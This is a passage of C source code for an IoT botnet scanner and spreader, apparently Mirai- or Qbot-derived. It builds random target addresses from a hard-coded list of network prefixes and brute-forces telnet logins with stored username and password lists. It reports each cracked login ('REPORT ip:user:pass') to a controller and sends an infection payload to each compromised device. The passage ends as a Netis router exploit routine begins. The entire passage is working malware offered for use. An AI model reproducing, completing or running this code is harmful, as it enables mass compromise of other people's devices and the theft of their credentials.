  920. }
  921. if(randnum == 75)
  922. {
  923. szprintf(ip, "14.177.%d.%d", ipState[3], ipState[4]);
  924. }
  925. if(randnum == 76)
  926. {
  927. szprintf(ip, "14.178.%d.%d", ipState[3], ipState[4]);
  928. }
  929. if(randnum == 77)
  930. {
  931. szprintf(ip, "14.179.%d.%d", ipState[3], ipState[4]);
  932. }
  933. if(randnum == 78)
  934. {
  935. szprintf(ip, "14.180.%d.%d", ipState[3], ipState[4]);
  936. }
  937. if(randnum == 79)
  938. {
  939. szprintf(ip, "14.181.%d.%d", ipState[3], ipState[4]);
  940. }
  941. if(randnum == 80)
  942. {
  943. szprintf(ip, "14.182.%d.%d", ipState[3], ipState[4]);
  944. }
  945. if(randnum == 81)
  946. {
  947. szprintf(ip, "14.183.%d.%d", ipState[3], ipState[4]);
  948. }
  949. if(randnum == 82)
  950. {
  951. szprintf(ip, "14.184.%d.%d", ipState[3], ipState[4]);
  952. }
  953. if(randnum == 83)
  954. {
  955. szprintf(ip, "14.185.%d.%d", ipState[3], ipState[4]);
  956. }
  957. if(randnum == 84)
  958. {
  959. szprintf(ip, "14.186.%d.%d", ipState[3], ipState[4]);
  960. }
  961. if(randnum == 85)
  962. {
  963. szprintf(ip, "14.187.%d.%d", ipState[3], ipState[4]);
  964. }
  965. if(randnum == 86)
  966. {
  967. szprintf(ip, "14.188.%d.%d", ipState[3], ipState[4]);
  968. }
  969. if(randnum == 87)
  970. {
  971. szprintf(ip, "14.189.%d.%d", ipState[3], ipState[4]);
  972. }
  973. if(randnum == 88)
  974. {
  975. szprintf(ip, "14.190.%d.%d", ipState[3], ipState[4]);
  976. }
  977. if(randnum == 89)
  978. {
  979. szprintf(ip, "14.191.%d.%d", ipState[3], ipState[4]);
  980. }
  981. if(randnum == 90)
  982. {
  983. szprintf(ip, "45.121.%d.%d", ipState[3], ipState[4]);
  984. }
  985. if(randnum == 91)
  986. {
  987. szprintf(ip, "45.120.%d.%d", ipState[3], ipState[4]);
  988. }
  989. if(randnum == 92)
  990. {
  991. szprintf(ip, "45.115.%d.%d", ipState[3], ipState[4]);
  992. }
  993. if(randnum == 93)
  994. {
  995. szprintf(ip, "43.252.%d.%d", ipState[3], ipState[4]);
  996. }
  997. if(randnum == 94)
  998. {
  999. szprintf(ip, "43.230.%d.%d", ipState[3], ipState[4]);
  1000. }
  1001. if(randnum == 95)
  1002. {
  1003. szprintf(ip, "43.240.%d.%d", ipState[3], ipState[4]);
  1004. }
  1005. if(randnum == 96)
  1006. {
  1007. szprintf(ip, "43.245.%d.%d", ipState[3], ipState[4]);
  1008. }
  1009. if(randnum == 97)
  1010. {
  1011. szprintf(ip, "41.174.%d.%d", ipState[3], ipState[4]);
  1012. }
  1013. if(randnum == 98)
  1014. {
  1015. szprintf(ip, "49.118.%d.%d", ipState[3], ipState[4]);
  1016. }
  1017. if(randnum == 99)
  1018. {
  1019. szprintf(ip, "78.188.%d.%d", ipState[3], ipState[4]);
  1020. }
  1021. if(randnum == 100)
  1022. {
  1023. szprintf(ip, "45.127.%d.%d", ipState[3], ipState[4]);
  1024. }
  1025. if(randnum == 101)
  1026. {
  1027. szprintf(ip, "103.30.%d.%d", ipState[3], ipState[4]);
  1028. }
  1029. if(randnum == 102)
  1030. {
  1031. szprintf(ip, "14.33.%d.%d", ipState[3], ipState[4]);
  1032. }
  1033. if(randnum == 103)
  1034. {
  1035. szprintf(ip, "123.16.%d.%d", ipState[3], ipState[4]);
  1036. }
  1037. if(randnum == 104)
  1038. {
  1039. szprintf(ip, "202.44.%d.%d", ipState[3], ipState[4]);
  1040. }
  1041. if(randnum == 105)
  1042. {
  1043. szprintf(ip, "116.93.%d.%d", ipState[3], ipState[4]);
  1044. }
  1045. if(randnum == 106)
  1046. {
  1047. szprintf(ip, "91.83.%d.%d", ipState[3], ipState[4]);
  1048. }
  1049. if(randnum == 107)
  1050. {
  1051. szprintf(ip, "41.253.%d.%d", ipState[3], ipState[4]);
  1052. }
  1053. if(randnum == 108)
  1054. {
  1055. szprintf(ip, "117.173.%d.%d", ipState[3], ipState[4]);
  1056. }
  1057. if(randnum == 109)
  1058. {
  1059. szprintf(ip, "113.190.%d.%d", ipState[3], ipState[4]);
  1060. }
  1061. if(randnum == 110)
  1062. {
  1063. szprintf(ip, "146.88.%d.%d", ipState[3], ipState[4]);
  1064. }
  1065. if(randnum == 111)
  1066. {
  1067. szprintf(ip, "112.196.%d.%d", ipState[3], ipState[4]);
  1068. }
  1069. if(randnum == 112)
  1070. {
  1071. szprintf(ip, "113.178.%d.%d", ipState[3], ipState[4]);
  1072. }
  1073. if(randnum == 113)
  1074. {
  1075. szprintf(ip, "112.45.%d.%d", ipState[3], ipState[4]);
  1076. }
  1077. if(randnum == 114)
  1078. {
  1079. szprintf(ip, "183.223.%d.%d", ipState[3], ipState[4]);
  1080. }
  1081. if(randnum == 115)
  1082. {
  1083. szprintf(ip, "116.71.%d.%d", ipState[3], ipState[4]);
  1084. }
  1085. if(randnum == 116)
  1086. {
  1087. szprintf(ip, "103.44.%d.%d", ipState[3], ipState[4]);
  1088. }
  1089. if(randnum == 117)
  1090. {
  1091. szprintf(ip, "110.235.%d.%d", ipState[3], ipState[4]);
  1092. }
  1093. if(randnum == 118)
  1094. {
  1095. szprintf(ip, "124.253.%d.%d", ipState[3], ipState[4]);
  1096. }
  1097. if(randnum == 119)
  1098. {
  1099. szprintf(ip, "211.237.%d.%d", ipState[3], ipState[4]);
  1100. }
  1101. if(randnum == 120)
  1102. {
  1103. szprintf(ip, "117.175.%d.%d", ipState[3], ipState[4]);
  1104. }
  1105. if(randnum == 121)
  1106. {
  1107. szprintf(ip, "117.173.%d.%d", ipState[3], ipState[4]);
  1108. }
  1109. if(randnum == 122)
  1110. {
  1111. szprintf(ip, "178.93.%d.%d", ipState[3], ipState[4]);
  1112. }
  1113. if(randnum == 123)
  1114. {
  1115. szprintf(ip, "111.9.%d.%d", ipState[3], ipState[4]);
  1116. }
  1117. if(randnum == 124)
  1118. {
  1119. szprintf(ip, "222.252.%d.%d", ipState[3], ipState[4]);
  1120. }
  1121. if(randnum == 125)
  1122. {
  1123. szprintf(ip, "113.174.%d.%d", ipState[3], ipState[4]);
  1124. }
  1125. if(randnum == 126)
  1126. {
  1127. szprintf(ip, "222.252.%d.%d", ipState[3], ipState[4]);
  1128. }
  1129. if(randnum == 127)
  1130. {
  1131. szprintf(ip, "113.160.%d.%d", ipState[3], ipState[4]);
  1132. }
  1133. if(randnum == 128)
  1134. {
  1135. szprintf(ip, "113.161.%d.%d", ipState[3], ipState[4]);
  1136. }
  1137. if(randnum == 129)
  1138. {
  1139. szprintf(ip, "113.162.%d.%d", ipState[3], ipState[4]);
  1140. }
  1141. if(randnum == 130)
  1142. {
  1143. szprintf(ip, "113.163.%d.%d", ipState[3], ipState[4]);
  1144. }
  1145. if(randnum == 131)
  1146. {
  1147. szprintf(ip, "113.164.%d.%d", ipState[3], ipState[4]);
  1148. }
  1149. if(randnum == 132)
  1150. {
  1151. szprintf(ip, "113.165.%d.%d", ipState[3], ipState[4]);
  1152. }
  1153. if(randnum == 133)
  1154. {
  1155. szprintf(ip, "113.166.%d.%d", ipState[3], ipState[4]);
  1156. }
  1157. if(randnum == 134)
  1158. {
  1159. szprintf(ip, "113.167.%d.%d", ipState[3], ipState[4]);
  1160. }
  1161. if(randnum == 135)
  1162. {
  1163. szprintf(ip, "113.168.%d.%d", ipState[3], ipState[4]);
  1164. }
  1165. if(randnum == 136)
  1166. {
  1167. szprintf(ip, "113.169.%d.%d", ipState[3], ipState[4]);
  1168. }
  1169. if(randnum == 137)
  1170. {
  1171. szprintf(ip, "123.17.%d.%d", ipState[3], ipState[4]);
  1172. }
  1173. if(randnum == 138)
  1174. {
  1175. szprintf(ip, "123.18.%d.%d", ipState[3], ipState[4]);
  1176. }
  1177. if(randnum == 139)
  1178. {
  1179. szprintf(ip, "123.19.%d.%d", ipState[3], ipState[4]);
  1180. }
  1181. if(randnum == 140)
  1182. {
  1183. szprintf(ip, "123.20.%d.%d", ipState[3], ipState[4]);
  1184. }
  1185. if(randnum == 141)
  1186. {
  1187. szprintf(ip, "123.21.%d.%d", ipState[3], ipState[4]);
  1188. }
  1189. if(randnum == 142)
  1190. {
  1191. szprintf(ip, "123.22.%d.%d", ipState[3], ipState[4]);
  1192. }
  1193. if(randnum == 143)
  1194. {
  1195. szprintf(ip, "222.252.%d.%d", ipState[3], ipState[4]);
  1196. }
  1197. if(randnum == 144)
  1198. {
  1199. szprintf(ip, "222.253.%d.%d", ipState[3], ipState[4]);
  1200. }
  1201. if(randnum == 145)
  1202. {
  1203. szprintf(ip, "222.254.%d.%d", ipState[3], ipState[4]);
  1204. }
  1205. if(randnum == 146)
  1206. {
  1207. szprintf(ip, "222.255.%d.%d", ipState[3], ipState[4]);
  1208. }
  1209. if(randnum == 147)
  1210. {
  1211. szprintf(ip, "37.247.%d.%d", ipState[3], ipState[4]);
  1212. }
  1213. if(randnum == 148)
  1214. {
  1215. szprintf(ip, "41.208.%d.%d", ipState[3], ipState[4]);
  1216. }
  1217. if(randnum == 149)
  1218. {
  1219. szprintf(ip, "183.220.%d.%d", ipState[3], ipState[4]);
  1220. }
  1221. if(randnum == 150)
  1222. {
  1223. szprintf(ip, "175.201.%d.%d", ipState[3], ipState[4]);
  1224. }
  1225. if(randnum == 151)
  1226. {
  1227. szprintf(ip, "103.198.%d.%d", ipState[3], ipState[4]);
  1228. }
  1229. if(randnum == 152)
  1230. {
  1231. szprintf(ip, "183.223.%d.%d", ipState[3], ipState[4]);
  1232. }
  1233. if(randnum == 153)
  1234. {
  1235. szprintf(ip, "50.205.%d.%d", ipState[3], ipState[4]);
  1236. }
  1237. if(randnum == 154)
  1238. {
  1239. szprintf(ip, "88.248.%d.%d", ipState[3], ipState[4]);
  1240. }
  1241. if(randnum == 155)
  1242. {
  1243. szprintf(ip, "88.105.%d.%d", ipState[3], ipState[4]);
  1244. }
  1245. if(randnum == 156)
  1246. {
  1247. szprintf(ip, "88.247.%d.%d", ipState[3], ipState[4]);
  1248. }
  1249. if(randnum == 157)
  1250. {
  1251. szprintf(ip, "85.105.%d.%d", ipState[3], ipState[4]);
  1252. }
  1253. if(randnum == 158)
  1254. {
  1255. szprintf(ip, "188.3.%d.%d", ipState[3], ipState[4]);
  1256. }
  1257. if(randnum == 159)
  1258. {
  1259. szprintf(ip, "103.203.%d.%d", ipState[3], ipState[4]);
  1260. }
  1261. if(randnum == 160)
  1262. {
  1263. szprintf(ip, "103.55.%d.%d", ipState[3], ipState[4]);
  1264. }
  1265. if(randnum == 161)
  1266. {
  1267. szprintf(ip, "103.220.%d.%d", ipState[3], ipState[4]);
  1268. }
  1269. if(randnum == 162)
  1270. {
  1271. szprintf(ip, "183.233.%d.%d", ipState[3], ipState[4]);
  1272. }
  1273. if(randnum == 163)
  1274. {
  1275. szprintf(ip, "103.242.%d.%d", ipState[3], ipState[4]);
  1276. }
  1277. if(randnum == 164)
  1278. {
  1279. szprintf(ip, "103.198.%d.%d", ipState[3], ipState[4]);
  1280. }
  1281. if(randnum == 165)
  1282. {
  1283. szprintf(ip, "103.14.%d.%d", ipState[3], ipState[4]);
  1284. }
  1285. if(randnum == 166)
  1286. {
  1287. szprintf(ip, "103.195.%d.%d", ipState[3], ipState[4]);
  1288. }
  1289. if(randnum == 167)
  1290. {
  1291. szprintf(ip, "103.203.%d.%d", ipState[3], ipState[4]);
  1292. }
  1293. if(randnum == 168)
  1294. {
  1295. szprintf(ip, "103.214.%d.%d", ipState[3], ipState[4]);
  1296. }
  1297. if(randnum == 169)
  1298. {
  1299. szprintf(ip, "103.218.%d.%d", ipState[3], ipState[4]);
  1300. }
  1301. if(randnum == 171)
  1302. {
  1303. szprintf(ip, "103.225.%d.%d", ipState[3], ipState[4]);
  1304. }
  1305. if(randnum == 172)
  1306. {
  1307. szprintf(ip, "103.228.%d.%d", ipState[3], ipState[4]);
  1308. }
  1309. if(randnum == 173)
  1310. {
  1311. szprintf(ip, "103.231.%d.%d", ipState[3], ipState[4]);
  1312. }
  1313. if(randnum == 174)
  1314. {
  1315. szprintf(ip, "103.60.%d.%d", ipState[3], ipState[4]);
  1316. }
  1317. if(randnum == 175)
  1318. {
  1319. szprintf(ip, "103.248.%d.%d", ipState[3], ipState[4]);
  1320. }
  1321. if(randnum == 176)
  1322. {
  1323. szprintf(ip, "103.253.%d.%d", ipState[3], ipState[4]);
  1324. }
  1325. if(randnum == 177)
  1326. {
  1327. szprintf(ip, "103.255.%d.%d", ipState[3], ipState[4]);
  1328. }
  1329. if(randnum == 178)
  1330. {
  1331. szprintf(ip, "103.35.%d.%d", ipState[3], ipState[4]);
  1332. }
  1333. if(randnum == 179)
  1334. {
  1335. szprintf(ip, "103.49.%d.%d", ipState[3], ipState[4]);
  1336. }
  1337. if(randnum == 180)
  1338. {
  1339. szprintf(ip, "103.62.%d.%d", ipState[3], ipState[4]);
  1340. }
  1341. if(randnum == 181)
  1342. {
  1343. szprintf(ip, "144.48.%d.%d", ipState[3], ipState[4]);
  1344. }
  1345. if(randnum == 182)
  1346. {
  1347. szprintf(ip, "163.47.%d.%d", ipState[3], ipState[4]);
  1348. }
  1349. if(randnum == 183)
  1350. {
  1351. szprintf(ip, "163.53.%d.%d", ipState[3], ipState[4]);
  1352. }
  1353. if(randnum == 184)
  1354. {
  1355. szprintf(ip, "223.29.%d.%d", ipState[3], ipState[4]);
  1356. }
  1357. if(randnum == 185)
  1358. {
  1359. szprintf(ip, "59.153.%d.%d", ipState[3], ipState[4]);
  1360. }
  1361. if(randnum == 186)
  1362. {
  1363. szprintf(ip, "113.176.%d.%d", ipState[3], ipState[4]);
  1364. }
  1365. if(randnum == 187)
  1366. {
  1367. szprintf(ip, "113.175.%d.%d", ipState[3], ipState[4]);
  1368. }
  1369. if(randnum == 188)
  1370. {
  1371. szprintf(ip, "113.177.%d.%d", ipState[3], ipState[4]);
  1372. }
  1373. if(randnum == 189)
  1374. {
  1375. szprintf(ip, "113.183.%d.%d", ipState[3], ipState[4]);
  1376. }
  1377. if(randnum == 190)
  1378. {
  1379. szprintf(ip, "202.164.%d.%d", ipState[3], ipState[4]);
  1380. }
  1381. if(randnum == 191)
  1382. {
  1383. szprintf(ip, "203.134.%d.%d", ipState[3], ipState[4]);
  1384. }
  1385. if(randnum == 192)
  1386. {
  1387. szprintf(ip, "210.56.%d.%d", ipState[3], ipState[4]);
  1388. }
  1389. if(randnum == 193)
  1390. {
  1391. szprintf(ip, "49.156.%d.%d", ipState[3], ipState[4]);
  1392. }
  1393. if(randnum == 194)
  1394. {
  1395. szprintf(ip, "203.210.%d.%d", ipState[3], ipState[4]);
  1396. }
  1397. if(randnum == 195)
  1398. {
  1399. szprintf(ip, "117.181.%d.%d", ipState[3], ipState[4]);
  1400. }
  1401. if(randnum == 196)
  1402. {
  1403. szprintf(ip, "117.178.%d.%d", ipState[3], ipState[4]);
  1404. }
  1405. if(randnum == 197)
  1406. {
  1407. szprintf(ip, "117.177.%d.%d", ipState[3], ipState[4]);
  1408. }
  1409. if(randnum == 198)
  1410. {
  1411. szprintf(ip, "117.176.%d.%d", ipState[3], ipState[4]);
  1412. }
  1413. if(randnum == 199)
  1414. {
  1415. szprintf(ip, "117.170.%d.%d", ipState[3], ipState[4]);
  1416. }
  1417. if(randnum == 200)
  1418. {
  1419. szprintf(ip, "117.171.%d.%d", ipState[3], ipState[4]);
  1420. }
  1421. if(randnum == 201)
  1422. {
  1423. szprintf(ip, "117.162.%d.%d", ipState[3], ipState[4]);
  1424. }
  1425. if(randnum == 201)
  1426. {
  1427. szprintf(ip, "112.26.%d.%d", ipState[3], ipState[4]);
  1428. }
  1429. if(randnum == 202)
  1430. {
  1431. szprintf(ip, "112.27.%d.%d", ipState[3], ipState[4]);
  1432. }
  1433. if(randnum == 203)
  1434. {
  1435. szprintf(ip, "112.28.%d.%d", ipState[3], ipState[4]);
  1436. }
  1437. if(randnum == 204)
  1438. {
  1439. szprintf(ip, "112.29.%d.%d", ipState[3], ipState[4]);
  1440. }
  1441. if(randnum == 205)
  1442. {
  1443. szprintf(ip, "112.30.%d.%d", ipState[3], ipState[4]);
  1444. }
  1445. if(randnum == 206)
  1446. {
  1447. szprintf(ip, "112.31.%d.%d", ipState[3], ipState[4]);
  1448. }
  1449. if(randnum == 207)
  1450. {
  1451. szprintf(ip, "203.150.%d.%d", ipState[3], ipState[4]);
  1452. }
  1453. if(randnum == 208)
  1454. {
  1455. szprintf(ip, "50.233.%d.%d", ipState[3], ipState[4]);
  1456. }
  1457.  
  1458. return inet_addr(ip);
  1459. }
  1460.  
  1461. int Dickranges[] = {110,111,112,113,114,115,116,117,118,119,223,1,27,182,36,39,42,123,122,41,59,220,221,175,14,101,58,60,61,183};
  1462. in_addr_t NetisRanges()
  1463. {
  1464. int range = rand() % (sizeof(Dickranges)/sizeof(char *));
  1465. ipState[1] = Dickranges[range];
  1466. ipState[2] = rand() % 255;
  1467. ipState[3] = rand() % 255;
  1468. ipState[4] = rand() % 255;
  1469. char ip[16] = {0};
  1470. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1471. return inet_addr(ip);
  1472. }
  1473. in_addr_t HackerScan(in_addr_t netmask)
  1474. {
  1475. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
  1476. return tmp ^ ( rand_cmwc() & ~netmask);
  1477. }
  1478. unsigned short csum (unsigned short *buf, int count)
  1479. {
  1480. register uint64_t sum = 0;
  1481. while( count > 1 ) { sum += *buf++; count -= 2; }
  1482. if(count > 0) { sum += *(unsigned char *)buf; }
  1483. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
  1484. return (uint16_t)(~sum);
  1485. }
  1486. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
  1487. {
  1488. struct tcp_pseudo
  1489. {
  1490. unsigned long src_addr;
  1491. unsigned long dst_addr;
  1492. unsigned char zero;
  1493. unsigned char proto;
  1494. unsigned short length;
  1495. } pseudohead;
  1496. unsigned short total_len = iph->tot_len;
  1497. pseudohead.src_addr=iph->saddr;
  1498. pseudohead.dst_addr=iph->daddr;
  1499. pseudohead.zero=0;
  1500. pseudohead.proto=IPPROTO_TCP;
  1501. pseudohead.length=htons(sizeof(struct tcphdr));
  1502. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  1503. unsigned short *tcp = malloc(totaltcp_len);
  1504. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  1505. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  1506. unsigned short output = csum(tcp,totaltcp_len);
  1507. free(tcp);
  1508. return output;
  1509. }
  1510. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
  1511. {
  1512. iph->ihl = 5;
  1513. iph->version = 4;
  1514. iph->tos = 0;
  1515. iph->tot_len = sizeof(struct iphdr) + packetSize;
  1516. iph->id = rand_cmwc();
  1517. iph->frag_off = 0;
  1518. iph->ttl = MAXTTL;
  1519. iph->protocol = protocol;
  1520. iph->check = 0;
  1521. iph->saddr = source;
  1522. iph->daddr = dest;
  1523. }
  1524. int sclose(int fd)
  1525. {
  1526. if(3 > fd) return 1;
  1527. close(fd);
  1528. return 0;
  1529. }
  1530. struct telstate_t
  1531. {
  1532. int fd;
  1533. unsigned int ip;
  1534. unsigned char state;
  1535. unsigned char complete;
  1536. unsigned char usernameInd;
  1537. unsigned char passwordInd;
  1538. unsigned char tempDirInd;
  1539. unsigned int totalTimeout;
  1540. unsigned short bufUsed;
  1541. char *sockbuf;
  1542. };
  1543. const char* get_telstate_host(struct telstate_t* telstate)
  1544. {
  1545. struct in_addr in_addr_ip;
  1546. in_addr_ip.s_addr = telstate->ip;
  1547. return inet_ntoa(in_addr_ip);
  1548. }
  1549. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
  1550. {
  1551. int num_bytes, i;
  1552. memset(buffer, 0, buf_size);
  1553. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  1554. if(buffer[0] == 0xFF)
  1555. {
  1556. negotiate(fd, buffer, 3);
  1557. }
  1558. if(contains_string(buffer, strings))
  1559. {
  1560. return 1;
  1561. }
  1562. return 0;
  1563. }
  1564. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
  1565. {
  1566. fd_set read_set;
  1567. struct timeval tv;
  1568. tv.tv_sec = 0;
  1569. tv.tv_usec = timeout_usec;
  1570. FD_ZERO(&read_set);
  1571. FD_SET(fd, &read_set);
  1572. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  1573. return 0;
  1574. return recv(fd, buffer, buf_size, 0);
  1575. }
  1576. int contains_success(char* buffer)
  1577. {
  1578. return contains_string(buffer, successes);
  1579. }
  1580. int contains_fail(char* buffer)
  1581. {
  1582. return contains_string(buffer, fails);
  1583. }
  1584. int contains_string(char* buffer, char** strings)
  1585. {
  1586. int num_strings = 0, i = 0;
  1587. for(num_strings = 0; strings[++num_strings] != 0; );
  1588. for(i = 0; i < num_strings; i++)
  1589. {
  1590. if(strcasestr(buffer, strings[i]))
  1591. {
  1592. return 1;
  1593. }
  1594. }
  1595. return 0;
  1596. }
  1597. //major improvments done by Jonah
  1598. void StartTheLelz() {
  1599. int i, res, j;
  1600. char buf[128], cur_dir;
  1601. int wait_usec = 10;
  1602. int maxfds = 1000;
  1603. int max = maxfds;
  1604. fd_set fdset;
  1605. struct timeval tv;
  1606. socklen_t lon;
  1607. int valopt;
  1608. srand(time(NULL) ^ rand_cmwc());
  1609. char line[256];
  1610. char* buffer;
  1611. struct sockaddr_in dest_addr;
  1612. dest_addr.sin_family = AF_INET;
  1613. dest_addr.sin_port = htons(23);
  1614. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1615. buffer = malloc(BUFFER_SIZE + 1);
  1616. memset(buffer, 0, BUFFER_SIZE + 1);
  1617. struct telstate_t fds[max];
  1618. memset(fds, 0, max * (sizeof(int) + 1));
  1619. for(i = 0; i < max; i++) {
  1620. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1621. fds[i].complete = 1;
  1622. fds[i].sockbuf = buffer; }
  1623. while(1) {
  1624. for(i = 0; i < max; i++) {
  1625. if(fds[i].totalTimeout == 0) {
  1626. fds[i].totalTimeout = time(NULL); }
  1627. switch(fds[i].state) {
  1628. case 0: {
  1629. if(fds[i].complete == 1) {
  1630. char *tmp = fds[i].sockbuf;
  1631. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1632. fds[i].sockbuf = tmp;
  1633. fds[i].ip = HackerScan2(); }
  1634. else if(fds[i].complete == 0) {
  1635. fds[i].passwordInd++;
  1636. fds[i].usernameInd++;
  1637. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
  1638. fds[i].complete = 1;
  1639. continue; }
  1640. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
  1641. fds[i].complete = 1;
  1642. continue;
  1643. }
  1644. }
  1645. dest_addr.sin_family = AF_INET;
  1646. dest_addr.sin_port = htons(23);
  1647. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1648. dest_addr.sin_addr.s_addr = fds[i].ip;
  1649. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1650. if(fds[i].fd == -1) continue;
  1651. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1652. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  1653. sclose(fds[i].fd);
  1654. fds[i].complete = 1; }
  1655. else {
  1656. fds[i].state = 1;
  1657. fds[i].totalTimeout = 0;
  1658. }
  1659. }
  1660. break;
  1661. case 1:
  1662. {
  1663. FD_ZERO(&fdset);
  1664. FD_SET(fds[i].fd, &fdset);
  1665. tv.tv_sec = 0;
  1666. tv.tv_usec = wait_usec;
  1667. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1668. if(res == 1) {
  1669. lon = sizeof(int);
  1670. valopt = 0;
  1671. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1672. if(valopt) {
  1673. sclose(fds[i].fd);
  1674. fds[i].state = 0;
  1675. fds[i].complete = 1;
  1676. } else {
  1677. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1678. fds[i].totalTimeout = 0;
  1679. fds[i].bufUsed = 0;
  1680. memset(fds[i].sockbuf, 0, 1024);
  1681. fds[i].state = 2;
  1682. } continue; }
  1683. else if(res == -1) {
  1684. sclose(fds[i].fd);
  1685. fds[i].state = 0;
  1686. fds[i].complete = 1;
  1687. continue; }
  1688. if(fds[i].totalTimeout + 6 < time(NULL)) {
  1689. sclose(fds[i].fd);
  1690. fds[i].state = 0;
  1691. fds[i].complete = 1;
  1692. }
  1693. }
  1694. break;
  1695. case 2:
  1696. {
  1697. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
  1698. if(contains_fail(fds[i].sockbuf)) {
  1699. fds[i].state = 0;
  1700. } else {
  1701. fds[i].state = 3; }
  1702. continue; }
  1703. if(fds[i].totalTimeout + 6 < time(NULL)) {
  1704. fds[i].state = 0;
  1705. fds[i].complete = 1;
  1706. }
  1707. }
  1708. break;
  1709. case 3: {
  1710. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
  1711. fds[i].state = 0;
  1712. fds[i].complete = 1;
  1713. continue; }
  1714. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  1715. fds[i].state = 0;
  1716. fds[i].complete = 1;
  1717. continue; }
  1718. fds[i].state = 4; }
  1719. break;
  1720. case 4:
  1721. {
  1722. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances))
  1723. {
  1724. if(contains_fail(fds[i].sockbuf)) {
  1725. fds[i].state = 0;
  1726. } else {
  1727. fds[i].state = 5; }
  1728. continue; }
  1729. if(fds[i].totalTimeout + 6 < time(NULL)) {
  1730. fds[i].state = 0;
  1731. fds[i].complete = 1;
  1732. }
  1733. }
  1734. break;
  1735. case 5:
  1736. {
  1737. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
  1738. fds[i].state = 0;
  1739. fds[i].complete = 1;
  1740. continue; }
  1741. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  1742. fds[i].state = 0;
  1743. fds[i].complete = 1;
  1744. continue; }
  1745. fds[i].state = 6;
  1746. }
  1747. break;
  1748. case 6:
  1749. {
  1750. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) {
  1751. fds[i].totalTimeout = time(NULL);
  1752. if(contains_fail(fds[i].sockbuf)) {
  1753. fds[i].state = 0; }
  1754. else if(contains_success(fds[i].sockbuf)) {
  1755. if(fds[i].complete == 2) {
  1756. fds[i].state = 7; }
  1757. else {
  1758. HackerPrint(D1ckSucka, "\x1b[0;31mSuccessfully Bruteforced IP: \x1b[0;33m%s | \x1b[0;31mUsername: \x1b[0;33m%s | \x1b[0;31mPassword: \x1b[0;33m%s\x1b[0m", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1759. HackerPrint(D1ckSucka, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1760. fds[i].state = 7; }
  1761. } else {
  1762. fds[i].state = 0;
  1763. fds[i].complete = 1;
  1764. } continue; }
  1765. if(fds[i].totalTimeout + 7 < time(NULL)) {
  1766. fds[i].state = 0;
  1767. fds[i].complete = 1;
  1768. }
  1769. }
  1770. break;
  1771. case 7:
  1772. {
  1773. fds[i].totalTimeout = time(NULL);
  1774. if(send(fds[i].fd, hvgsgd, strlen(hvgsgd), MSG_NOSIGNAL) < 0) {
  1775. sclose(fds[i].fd);
  1776. fds[i].state = 0;
  1777. fds[i].complete = 1;
  1778. continue; }
  1779. fds[i].complete = 3;
  1780. if(fds[i].totalTimeout + 60 < time(NULL)) {
  1781. if(fds[i].complete !=3){
  1782. }
  1783. fds[i].state = 0;
  1784. fds[i].complete = 1;
  1785. }
  1786. break;
  1787. }
  1788. }
  1789. }
  1790. }
  1791. }
  1792. void StartTheNetis()
  1793. {
  1794. while(1){
  1795. char payload2[1024];
  1796. int clientSocket, portNum, nBytes;
  1797. struct sockaddr_in serverAddr;
  1798. socklen_t addr_size;
  1799. clientSocket = socket(PF_INET, SOCK_DGRAM, 0);
  1800. uint32_t ip;
  1801. ip = NetisRanges();
  1802. serverAddr.sin_family = AF_INET;
  1803. serverAddr.sin_port = htons(53413);
  1804. serverAddr.sin_addr.s_addr = ip;
  1805. memset(serverAddr.sin_zero, '\0', sizeof serverAddr.sin_zero);
  1806. addr_size = sizeof serverAddr;
